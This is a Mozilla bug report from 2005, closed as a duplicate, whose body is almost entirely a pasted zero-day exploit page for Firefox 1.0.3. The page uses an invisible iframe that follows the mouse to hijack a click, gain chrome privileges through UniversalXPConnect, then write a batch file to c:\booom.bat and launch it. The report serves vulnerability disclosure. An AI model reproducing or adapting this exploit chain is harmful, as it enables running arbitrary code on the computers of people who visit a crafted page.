Closed Bug 293413 Opened 20 years ago Closed 20 years ago

If a user clicks anywhere on a specially crafted page, this code will

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
VERIFIED DUPLICATE of bug 293302

People

(Reporter: akinci313, Unassigned)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

------------------------------------- exploit.htm
-------------------------------------
// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
// If a user clicks anywhere on a specially crafted page, this code will
// automatically create and execute a malicious batch/exe file.

<html><head><title>firefox 0day exploit</title>

<body>Click anywhere inside this page<br>
<br>
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if
(window.name!=\'stealcookies\')
{window.name=\'stealcookies\';} else{
event={target:{href:\'http://ftp.mozilla.org/pub/
mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You
are
vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\
booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].
createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08
|0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious
commands here...
\\\\\\\\nPAUSE\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();
\\\')\'); }')+'</noscript><a
href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
id=220&application=firefox\' style=\'cursor:default;\'> ;; ;; ;;</'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight=0"
style=
"position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px;
padding:0px;
-moz-opacity:0"></iframe>


<script language="JavaScript" type="text/javascript">

document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}

var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>


Reproducible: Didn't try

*** This bug has been marked as a duplicate of 293302 ***
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.